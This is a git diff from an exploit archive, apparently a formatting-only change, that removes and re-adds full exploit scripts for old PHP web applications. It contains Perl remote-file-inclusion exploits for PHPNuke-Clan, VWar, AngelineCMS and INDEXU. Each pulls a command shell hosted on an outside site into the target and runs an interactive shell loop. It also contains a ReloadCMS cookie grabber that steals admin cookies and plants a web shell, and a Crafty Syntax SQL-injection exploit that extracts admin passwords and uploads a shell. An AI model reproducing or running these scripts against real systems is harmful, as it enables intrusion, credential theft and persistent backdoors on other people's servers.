HTTP::Request->new(GET =>$Path.'modules/vWar_Account/includes/functions_common.php?vwar_root2='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; + +$res = $xpl->request($req); +$return = $res->content; +$return =~ tr/[\n]/[ê]/; + +if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} + +elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /) + {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} +elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"} + +if($return =~ /(.+).Warning.(.+).Warning/) + + + +{ + $finreturn = $1; + $finreturn=~ 
tr/[ê]/[\n]/; + print "\r\n$finreturn\n\r"; + last; +} + +else {print "[shell] \$";}}}last; + +sub head() + { + print "\n============================================================================\r\n"; + print " *PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit*\r\n"; + print "============================================================================\r\n"; + } +sub usage() + { + head(); + print " Usage: perl pnc.pl \r\n\n"; + print " - Full path to PNC ex: http://www.site.com/PNC/ \r\n"; + print " - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n"; + print " - Command variable used in php shell \r\n"; + print "============================================================================\r\n"; + print " Bug Found by uid0\r\n"; + print " www.exploitercode.com irc.exploitercode.com #exploitercode\r\n"; + print "============================================================================\r\n"; + exit(); + } + +# milw0rm.com [2006-04-01] diff --git a/platforms/php/webapps/1631.php b/platforms/php/webapps/1631.php index 1ba341340..76b1f32b3 100755 --- a/platforms/php/webapps/1631.php +++ b/platforms/php/webapps/1631.php 
@@ -1,140 +1,140 @@ -nc target.host.com 80 -GET /path_to_reloadcms/ HTTP/1.0 -User-Agent: "> -Host: target.host.com -Connection: Close - -So, when admin see site statistics through the administration panel, javascript -will run - -Once grab.php script captures admin cookie, the script itself can upload a shell -trough filemanager, launch commands and write output to a logfile also, inside -cookies, there is admin MD5 password hash - -rgod -mail: rgod@autistici.org -site: http://retrogod.altervista.org - */ - -#--------------------------------grab.php--------------------------------------- -#cookie grabber / backdoor install - -$cmd="uname -a"; //a shell command, leave empty to lauch commands later trough suntzu.php -$proxy=""; //you can use a proxy (ip:port), otherwise leave empty -$logfile="log.txt"; -$filename="suntzu.php"; //shell filename - -error_reporting(0); -ignore_user_abort(1); -ini_set("max_execution_time",0); - -//log referer and cookies -$fp=fopen($logfile,"a"); -fputs($fp,$_GET['ref']."|".$_GET['c']."\r\n"); - -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - die; - } - $parts=explode(':',$proxy); - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); -} - -$temp=explode("/",$_GET['ref']); -$host=$temp[2]; -$path=""; -if (count($temp)>4) -{ -for ($i=3; $i<=count($temp)-2; $i++) -{$path.="/".$temp[$i];} -} -$path.="/"; -$port=80; - -#step 1 -> Get full application path, it is inside html, you need this to upload a shell 
-$packet ="GET ".$path."admin.php?show=module&id=general.filemanager HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: ".$_GET[c].";\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); - -#step 2 -> Upload the evil code -$temp=explode('name="path" value="',$html); -$temp2=explode("\"",$temp[1]); -$fullpath=$temp2[0]; -$shell=''; -$data="-----------------------------7d529a1d23092a\r\n"; -$data.="Content-Disposition: form-data; name=\"upload\"; filename=\"$filename\"\r\n"; -$data.="Content-Type:\r\n\r\n"; -$data.="$shell\r\n"; -$data.="-----------------------------7d529a1d23092a\r\n"; -$data.="Content-Disposition: form-data; name=\"path\"\r\n\r\n"; -$data.="$fullpath\r\n"; -$data.="-----------------------------7d529a1d23092a\r\n"; -$data.="Content-Disposition: form-data; name=\"test\"\r\n\r\n"; -$data.="Upload\r\n"; -$data.="-----------------------------7d529a1d23092a--\r\n"; -$packet ="POST ".$path."admin.php?show=module&id=general.filemanager HTTP/1.0\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Cookie: ".$_GET[c].";\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); - -$packet ="GET ".$path."suntzu.php?cmd=".urlencode($cmd)." 
HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); - -//log output -fputs($fp,"suntzu>".$cmd."\r\n"); -fputs($fp,"\r\n".$html."\r\n"); -fclose($fp); -header ("Location: ".$_GET['ref']); -?> - -# milw0rm.com [2006-04-02] +nc target.host.com 80 +GET /path_to_reloadcms/ HTTP/1.0 +User-Agent: "> +Host: target.host.com +Connection: Close + +So, when admin see site statistics through the administration panel, javascript +will run + +Once grab.php script captures admin cookie, the script itself can upload a shell +trough filemanager, launch commands and write output to a logfile also, inside +cookies, there is admin MD5 password hash + +rgod +mail: rgod@autistici.org +site: http://retrogod.altervista.org + */ + +#--------------------------------grab.php--------------------------------------- +#cookie grabber / backdoor install + +$cmd="uname -a"; //a shell command, leave empty to lauch commands later trough suntzu.php +$proxy=""; //you can use a proxy (ip:port), otherwise leave empty +$logfile="log.txt"; +$filename="suntzu.php"; //shell filename + +error_reporting(0); +ignore_user_abort(1); +ini_set("max_execution_time",0); + +//log referer and cookies +$fp=fopen($logfile,"a"); +fputs($fp,$_GET['ref']."|".$_GET['c']."\r\n"); + +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + die; + } + $parts=explode(':',$proxy); + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); +} + 
+$temp=explode("/",$_GET['ref']); +$host=$temp[2]; +$path=""; +if (count($temp)>4) +{ +for ($i=3; $i<=count($temp)-2; $i++) +{$path.="/".$temp[$i];} +} +$path.="/"; +$port=80; + +#step 1 -> Get full application path, it is inside html, you need this to upload a shell +$packet ="GET ".$path."admin.php?show=module&id=general.filemanager HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: ".$_GET[c].";\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); + +#step 2 -> Upload the evil code +$temp=explode('name="path" value="',$html); +$temp2=explode("\"",$temp[1]); +$fullpath=$temp2[0]; +$shell=''; +$data="-----------------------------7d529a1d23092a\r\n"; +$data.="Content-Disposition: form-data; name=\"upload\"; filename=\"$filename\"\r\n"; +$data.="Content-Type:\r\n\r\n"; +$data.="$shell\r\n"; +$data.="-----------------------------7d529a1d23092a\r\n"; +$data.="Content-Disposition: form-data; name=\"path\"\r\n\r\n"; +$data.="$fullpath\r\n"; +$data.="-----------------------------7d529a1d23092a\r\n"; +$data.="Content-Disposition: form-data; name=\"test\"\r\n\r\n"; +$data.="Upload\r\n"; +$data.="-----------------------------7d529a1d23092a--\r\n"; +$packet ="POST ".$path."admin.php?show=module&id=general.filemanager HTTP/1.0\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n"; +$packet.="User-Agent: Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Cookie: ".$_GET[c].";\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); + +$packet ="GET ".$path."suntzu.php?cmd=".urlencode($cmd)." HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); + +//log output +fputs($fp,"suntzu>".$cmd."\r\n"); +fputs($fp,"\r\n".$html."\r\n"); +fclose($fp); +header ("Location: ".$_GET['ref']); +?> + +# milw0rm.com [2006-04-02] 
diff --git a/platforms/php/webapps/1632.pl b/platforms/php/webapps/1632.pl index a01233e14..1b4fc3b3a 100755 --- a/platforms/php/webapps/1632.pl +++ b/platforms/php/webapps/1632.pl 
@@ -1,92 +1,92 @@ -#!/usr/bin/perl -## -# VWar <= 1.5.0 R12 Remote File Inclusion Exploit -# Bug Found By uid0 code by zod -## -# (c) 2006 -# ExploiterCode.com -## -# usage: -# perl vwar.pl -# -# perl vwar.pl http://site.com/VWar/ http://site.com/cmd.txt cmd -# -# cmd shell example: -# -# cmd shell variable: ($_GET[cmd]); -## -# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else! -# -# special shout to [ill]will! -## -# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com -## -# Comments: -# I release a new exploit because VWar -# Dev. Team called my other exploit XSS!!! -## - -use LWP::UserAgent; - -$Path = $ARGV[0]; -$Pathtocmd = $ARGV[1]; -$cmdv = $ARGV[2]; - -if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} - -head(); - -while() -{ - print "[shell] \$"; -while() - { - $cmd=$_; - chomp($cmd); - -$xpl = LWP::UserAgent->new() or die; -$req = HTTP::Request->new(GET =>$Path.'includes/get_header.php?vwar_root='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; - -$res = $xpl->request($req); -$return = $res->content; -$return =~ tr/[\n]/[ê]/; - -if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} - -elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /) - {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} -elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"} - -if($return =~ /(.+).Fatal.error/) - - -{ - $finreturn = $1; - $finreturn=~ tr/[ê]/[\n]/; - print "\r\n$finreturn\n\r"; - last; -} - -else {print "[shell] \$";}}}last; - -sub head() - { - print "\n============================================================================\r\n"; - print " *VWar <= 1.5.0 R12 Remote File Inclusion Exploit*\r\n"; - print "============================================================================\r\n"; - } -sub usage() - { - head(); - print " Usage: perl 
vwar.pl \r\n\n"; - print " - Full path to VWar ex: http://www.site.com/VWar/ \r\n"; - print " - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n"; - print " - Command variable used in php shell \r\n"; - print "============================================================================\r\n"; - print " Bug Found by uid0\r\n"; - print " www.exploitercode.com irc.exploitercode.com #exploitercode\r\n"; - print "============================================================================\r\n"; - exit(); - } - -# milw0rm.com [2006-04-02] +#!/usr/bin/perl +## +# VWar <= 1.5.0 R12 Remote File Inclusion Exploit +# Bug Found By uid0 code by zod +## +# (c) 2006 +# ExploiterCode.com +## +# usage: +# perl vwar.pl +# +# perl vwar.pl http://site.com/VWar/ http://site.com/cmd.txt cmd +# +# cmd shell example: +# +# cmd shell variable: ($_GET[cmd]); +## +# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else! +# +# special shout to [ill]will! +## +# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com +## +# Comments: +# I release a new exploit because VWar +# Dev. Team called my other exploit XSS!!! 
+## + +use LWP::UserAgent; + +$Path = $ARGV[0]; +$Pathtocmd = $ARGV[1]; +$cmdv = $ARGV[2]; + +if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} + +head(); + +while() +{ + print "[shell] \$"; +while() + { + $cmd=$_; + chomp($cmd); + +$xpl = LWP::UserAgent->new() or die; +$req = HTTP::Request->new(GET =>$Path.'includes/get_header.php?vwar_root='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; + +$res = $xpl->request($req); +$return = $res->content; +$return =~ tr/[\n]/[ê]/; + +if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} + +elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /) + {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} +elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"} + +if($return =~ /(.+).Fatal.error/) + + +{ + $finreturn = $1; + $finreturn=~ tr/[ê]/[\n]/; + print "\r\n$finreturn\n\r"; + last; +} + +else {print "[shell] \$";}}}last; + +sub head() + { + print "\n============================================================================\r\n"; + print " *VWar <= 1.5.0 R12 Remote File Inclusion Exploit*\r\n"; + print "============================================================================\r\n"; + } +sub usage() + { + head(); + print " Usage: perl vwar.pl \r\n\n"; + print " - Full path to VWar ex: http://www.site.com/VWar/ \r\n"; + print " - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n"; + print " - Command variable used in php shell \r\n"; + print "============================================================================\r\n"; + print " Bug Found by uid0\r\n"; + print " www.exploitercode.com irc.exploitercode.com #exploitercode\r\n"; + print "============================================================================\r\n"; + exit(); + } + +# milw0rm.com [2006-04-02] 
diff --git a/platforms/php/webapps/1640.pl b/platforms/php/webapps/1640.pl index 529466956..8cf85aeb3 100755 --- a/platforms/php/webapps/1640.pl +++ b/platforms/php/webapps/1640.pl 
@@ -1,87 +1,87 @@ -#!/usr/bin/perl -## -# AngelineCMS 0.8.1 installpath Remote Code Execution Exploit -# Bug Found & code By K-159 -# code reference from uid0/zod at ExploiterCode.com -## -# echo.or.id (c) 2006 -# -## -# usage: -# perl angelineCMS.pl -# -# perl angelineCMS.pl http://target.com/ http://site.com/cmd.txt cmd -# -# cmd shell example: -# -# cmd shell variable: ($_GET[cmd]); -## -# # -# -# Contact: www.echo.or.id #e-c-h-o @irc.dal.net -## - -use LWP::UserAgent; - -$Path = $ARGV[0]; -$Pathtocmd = $ARGV[1]; -$cmdv = $ARGV[2]; - -if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} - -head(); - -while() -{ - print "[shell] \$"; -while() - { - $cmd=$_; - chomp($cmd); - -$xpl = LWP::UserAgent->new() or die; -$req = HTTP::Request->new(GET =>$Path.'kernel/loadkernel.php?installPath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; - -$res = $xpl->request($req); -$return = $res->content; -$return =~ tr/[\n]/[Ã.ª]/; - -if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} - -elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /) - {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} -elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"} - -if($return =~ /(.*)/) - - -{ - $finreturn = $1; - $finreturn=~ tr/[Ã.ª]/[\n]/; - print "\r\n$finreturn\n\r"; - last; -} - -else {print "[shell] \$";}}}last; - -sub head() - { - print "\n============================================================================\r\n"; - print " *AngelineCMS 0.8.1 installpath Remote Code Execution Exploit*\r\n"; - print "============================================================================\r\n"; - } -sub usage() - { - head(); - print " Usage: perl angelineCMS.pl \r\n\n"; - print " - Full path to angelineCMS ex: http://www.site.com/ \r\n"; - print " - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n"; - print " - Command 
variable used in php shell \r\n"; - print "============================================================================\r\n"; - print " Bug Found by K-159 \r\n"; - print " www.echo.or.id #e-c-h-o irc.dal.net \r\n"; - print "============================================================================\r\n"; - exit(); - } - -# milw0rm.com [2006-04-04] +#!/usr/bin/perl +## +# AngelineCMS 0.8.1 installpath Remote Code Execution Exploit +# Bug Found & code By K-159 +# code reference from uid0/zod at ExploiterCode.com +## +# echo.or.id (c) 2006 +# +## +# usage: +# perl angelineCMS.pl +# +# perl angelineCMS.pl http://target.com/ http://site.com/cmd.txt cmd +# +# cmd shell example: +# +# cmd shell variable: ($_GET[cmd]); +## +# # +# +# Contact: www.echo.or.id #e-c-h-o @irc.dal.net +## + +use LWP::UserAgent; + +$Path = $ARGV[0]; +$Pathtocmd = $ARGV[1]; +$cmdv = $ARGV[2]; + +if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} + +head(); + +while() +{ + print "[shell] \$"; +while() + { + $cmd=$_; + chomp($cmd); + +$xpl = LWP::UserAgent->new() or die; +$req = HTTP::Request->new(GET =>$Path.'kernel/loadkernel.php?installPath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; + +$res = $xpl->request($req); +$return = $res->content; +$return =~ tr/[\n]/[Ã.ª]/; + +if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} + +elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /) + {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} +elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"} + +if($return =~ /(.*)/) + + +{ + $finreturn = $1; + $finreturn=~ tr/[Ã.ª]/[\n]/; + print "\r\n$finreturn\n\r"; + last; +} + +else {print "[shell] \$";}}}last; + +sub head() + { + print "\n============================================================================\r\n"; + print " *AngelineCMS 0.8.1 installpath Remote Code Execution Exploit*\r\n"; + print 
"============================================================================\r\n"; + } +sub usage() + { + head(); + print " Usage: perl angelineCMS.pl \r\n\n"; + print " - Full path to angelineCMS ex: http://www.site.com/ \r\n"; + print " - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n"; + print " - Command variable used in php shell \r\n"; + print "============================================================================\r\n"; + print " Bug Found by K-159 \r\n"; + print " www.echo.or.id #e-c-h-o irc.dal.net \r\n"; + print "============================================================================\r\n"; + exit(); + } + +# milw0rm.com [2006-04-04] diff --git a/platforms/php/webapps/1644.pl b/platforms/php/webapps/1644.pl index 51b3e1887..0bf5f33df 100755 --- a/platforms/php/webapps/1644.pl +++ b/platforms/php/webapps/1644.pl 
@@ -1,91 +1,91 @@ -#!/usr/bin/perl -## -# INDEXU <= 5.0.1 base_path Remote File Inclusion Exploit -# Bug Found & code By K-159 -# -# base on advisory at http://echo.or.id/adv/adv26-K-159-2006.txt -# -# code reference from ExploiterCode.com -## -# www.echo.or.id (c) 2006 -# -## -# usage: -# perl indexu.pl -# -# perl indexu.pl http://target.com/indexu/ http://target.com/cmd.txt cmd -# -# cmd shell example: -# -# cmd shell variable: ($_GET[cmd]); -## -# # -#greetz:echo|staff(y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous),kaiten,an0maly,SinChan,sakitjiwa,rizal,etc -# -# Contact: eufrato[at]gmail.com www.echo.or.id #e-c-h-o @irc.dal.net -## - -use LWP::UserAgent; - -$Path = $ARGV[0]; -$Pathtocmd = $ARGV[1]; -$cmdv = $ARGV[2]; - -if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} - -head(); - -while() -{ - print "[shell] \$"; -while() - { - $cmd=$_; - chomp($cmd); - -$xpl = LWP::UserAgent->new() or die; -$req = HTTP::Request->new(GET =>$Path.' application.php?base_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; - -$res = $xpl->request($req); -$return = $res->content; -$return =~ tr/[\n]/[ê]/; - -if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} - -elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /) - {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} -elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"} - -if($return =~ /(.*)/) - - -{ - $finreturn = $1; - $finreturn=~ tr/[ê]/[\n]/; - print "\r\n$finreturn\n\r"; - last; -} - -else {print "[shell] \$";}}}last; - -sub head() - { - print "\n============================================================================\r\n"; - print " *INDEXU <= 5.0.1 base_path Remote File Inclusion Exploit*\r\n"; - print "============================================================================\r\n"; - } -sub usage() - { - head(); - print " Usage: perl 
indexu.pl \r\n\n"; - print " - Full path to INDEXU ex: http://www.site.com/indexu/ \r\n"; - print " - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n"; - print " - Command variable used in php shell \r\n"; - print "============================================================================\r\n"; - print " Bug Found by K-159 \r\n"; - print " www.echo.or.id #e-c-h-o irc.dal.net \r\n"; - print "============================================================================\r\n"; - exit(); - } - -# milw0rm.com [2006-04-04] +#!/usr/bin/perl +## +# INDEXU <= 5.0.1 base_path Remote File Inclusion Exploit +# Bug Found & code By K-159 +# +# base on advisory at http://echo.or.id/adv/adv26-K-159-2006.txt +# +# code reference from ExploiterCode.com +## +# www.echo.or.id (c) 2006 +# +## +# usage: +# perl indexu.pl +# +# perl indexu.pl http://target.com/indexu/ http://target.com/cmd.txt cmd +# +# cmd shell example: +# +# cmd shell variable: ($_GET[cmd]); +## +# # +#greetz:echo|staff(y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous),kaiten,an0maly,SinChan,sakitjiwa,rizal,etc +# +# Contact: eufrato[at]gmail.com www.echo.or.id #e-c-h-o @irc.dal.net +## + +use LWP::UserAgent; + +$Path = $ARGV[0]; +$Pathtocmd = $ARGV[1]; +$cmdv = $ARGV[2]; + +if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} + +head(); + +while() +{ + print "[shell] \$"; +while() + { + $cmd=$_; + chomp($cmd); + +$xpl = LWP::UserAgent->new() or die; +$req = HTTP::Request->new(GET =>$Path.' 
application.php?base_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; + +$res = $xpl->request($req); +$return = $res->content; +$return =~ tr/[\n]/[ê]/; + +if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} + +elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /) + {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} +elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"} + +if($return =~ /(.*)/) + + +{ + $finreturn = $1; + $finreturn=~ tr/[ê]/[\n]/; + print "\r\n$finreturn\n\r"; + last; +} + +else {print "[shell] \$";}}}last; + +sub head() + { + print "\n============================================================================\r\n"; + print " *INDEXU <= 5.0.1 base_path Remote File Inclusion Exploit*\r\n"; + print "============================================================================\r\n"; + } +sub usage() + { + head(); + print " Usage: perl indexu.pl \r\n\n"; + print " - Full path to INDEXU ex: http://www.site.com/indexu/ \r\n"; + print " - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n"; + print " - Command variable used in php shell \r\n"; + print "============================================================================\r\n"; + print " Bug Found by K-159 \r\n"; + print " www.echo.or.id #e-c-h-o irc.dal.net \r\n"; + print "============================================================================\r\n"; + exit(); + } + +# milw0rm.com [2006-04-04] diff --git a/platforms/php/webapps/1645.pl b/platforms/php/webapps/1645.pl index b83536161..5c34a99cc 100755 --- a/platforms/php/webapps/1645.pl +++ b/platforms/php/webapps/1645.pl 
@@ -1,539 +1,539 @@
-#!/usr/bin/perl
-###############################################################################
-# This program is free software; you can redistribute it and/or
-# modify it under the terms of the GNU General Public License
-# as published by the Free Software Foundation; either version 2
-# of the License, or (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, write to the Free Software
-# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
-###############################################################################
-
-# =====================================================
-# $ crappy_syntax.pl localhost/csig/ 80
-#
-# :: crafty syntax image gallery <= 3.1g
-# :: by undefined1_ @ bash-x.net/undef/
-# :: note: this works only on mysql >= 4.0
-#
-#
-# [+] creating user account
-# [+] user: 98fe56123
-# password: 7652L4M3l39q
-# email: SehswdSx0E@hotmail.com
-# [+] user '98fe56123' with password '7652L4M3l39q' registered
-# [+] logged in as 98fe56123
-# [+] projectid is 2
-# [-] no admin found for this projectid, trying the username 'admin'
-# [+] admin username: 'admin'
-# [+] admin password: '1111'
-# [+] logged in as 'admin'
-# [+] getting shell location
-# [+] shell @ 'userimages/1/18d76bcbc6f2.php'
-# [+] have phun?
-#
-# localhost$ uname
-# Linux
-# localhost$ whoami
-# nobody
-# =====================================================
-
-use strict;
-use IO::Socket;
-
-$| = 1;
-print ":: crafty syntax image gallery <= 3.1g\n";
-print ":: by undefined1_ @ bash-x.net/undef/\n";
-print ":: note: this works only on mysql >= 4.0\n\n\n";
-
-my $website = shift || usage();
-my $port = shift || usage();
-my $user = shift;
-my $password = shift;
-my $location = shift;
-
-
-
-my $path = "/";
-my $server = $website;
-if(index($website, "/") != -1)
-{
- $path = substr($website, index($website, "/"));
- $server = substr($website, 0, index($website, "/"));
- if(substr($path, length($path)-1) ne "/")
- {
- $path .= "/";
- }
-}
-if($location eq "")
-{
- if($user eq "" && $password eq "")
- {
- print "[+] creating user account\n";
- $user = randstring(8,12);
- $password = randstring(8,12);
- my $email = randstring(8,12)."\@hotmail.com";
- printf("[+]\tuser: %s\n", $user);
- printf("\tpassword: %s\n", $password);
- printf("\temail: %s\n", $email);
- register($server, $path, $user, $user, $password, $email);
- }
-
- my $cookies = login($server, $port, $path, $user, $password);
- my $projectid = get_projectid($server, $port, $path, $cookies);
- my @admin = send_payload($server, $port, $path, $cookies, $projectid);
-
- $cookies = login($server, $port, $path, $admin[0], $admin[1]);
- upload_shell($server, $port, $path, $cookies, $projectid);
- $location = get_shell_location($server,$port,$path,$cookies);
-}
-
-check_shell($server, $port, $path, $location);
-printf("[+] have phun?\n\n");
-my $command;
-while(1)
-{
- print $server."\$ ";
- while()
- {
- $command = $_;
- chomp($command);
- last;
- }
- do_shell($server,$port,$path,$location,$command);
-}
-
-
-sub send_payload(\$,\$,\$,\$,\$) {
- my $server = shift;
- my $port = shift;
- my $path = shift;
- my $cookies = shift;
- my $projectid = shift;
- my $shellcode;
-
- $shellcode = "\x61\x6e\x64\x20\x31\x3d\x30\x20\x75\x6e\x69\x6f\x6e\x20";
- 
$shellcode .= "\x61\x6c\x6c\x20\x73\x65\x6c\x65\x63\x74\x20\x31\x2c\x32";
- $shellcode .= "\x2c\x33\x2c\x34\x2c\x35\x2c\x75\x73\x65\x72\x69\x64\x20";
- $shellcode .= "\x61\x73\x20\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e";
- $shellcode .= "\x2c\x37\x2c\x38\x2c\x39\x2c\x30\x2c\x31\x2c\x32\x2c\x33";
- $shellcode .= "\x2c\x34\x2c\x35\x2c\x35\x20\x66\x72\x6f\x6d\x20\x67\x61";
- $shellcode .= "\x6c\x6c\x65\x72\x79\x5f\x61\x63\x63\x65\x73\x73\x20\x77";
- $shellcode .= "\x68\x65\x72\x65\x20\x67\x61\x6c\x6c\x65\x72\x79\x69\x64";
- $shellcode .= "\x3d";
- $shellcode .= $projectid;
- $shellcode .= "\x20\x61\x6e\x64\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f";
- $shellcode .= "\x6e\x73\x3d\x43\x4f\x4e\x43\x41\x54\x28\x30\x78\x34\x36";
- $shellcode .= "\x35\x35\x34\x63\x34\x63\x29\x20\x2d\x2d";
-
- my $query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\r\n";
- $query .= "Host: $server\r\n";
- $query .= "User-Agent: Mozilla/5.0\r\n";
- $query .= "Connection: close\r\n";
- $query .= $cookies;
- $query .= "\r\n";
- my $data = sendpacket($server, $port, $query);
- if($data !~ /photo_captions\[1\] = "/)
- {
- print "[-] no admin found for this projectid, trying the username 'admin'\n";
- $shellcode = "and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where username=CONCAT(0x61646d696e) --";
- $query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." 
HTTP/1.1\r\n";
- $query .= "Host: $server\r\n";
- $query .= "User-Agent: Mozilla/5.0\r\n";
- $query .= "Connection: close\r\n";
- $query .= $cookies;
- $query .= "\r\n";
- my $data = sendpacket($server, $port, $query);
- if($data !~ /photo_captions\[1\] = "/ || $data !~ /photo_urls\[1\] = "/)
- {
- print "[-] exploit failed\n";
- exit;
- }
- my $index1 = index($data, "photo_captions[1] = \" ") + 22;
- my $index2 = index($data, "\"", $index1);
- my $passwd = substr($data, $index1, $index2-$index1);
-
- $index1 = index($data, "photo_urls[1] = \"") + 17;
- $index2 = index($data, "\"", $index1);
- $data = substr($data, $index1, $index2-$index1);
- $index1 = rindex($data, "/") + 1;
- my $username = substr($data, $index1);
-
-
- print "[+] admin username: '$username'\n";
- print "[+] admin password: '$passwd'\n";
-
- my @ret;
- push(@ret, $username);
- push(@ret, $passwd);
- return @ret;
- }
